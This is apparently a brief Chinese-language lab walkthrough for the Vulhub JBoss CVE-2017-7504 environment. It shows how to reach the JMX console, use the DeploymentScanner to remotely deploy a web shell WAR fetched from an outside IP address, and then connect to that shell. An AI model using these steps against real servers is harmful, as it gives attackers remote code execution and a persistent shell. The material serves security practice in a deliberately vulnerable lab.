1.环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
2.访问漏洞网站
http://47.121.211.205:8080/jmx-console/http://47.121.211.205:8080/jmx-console/
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进 去(通过URL的⽅式远程部署)
4.输入远程war包地址
http://47.121.211.205/shell.war
上传成功
5.访问上传文件并进行连接
访问上传文件
使用工具进行连接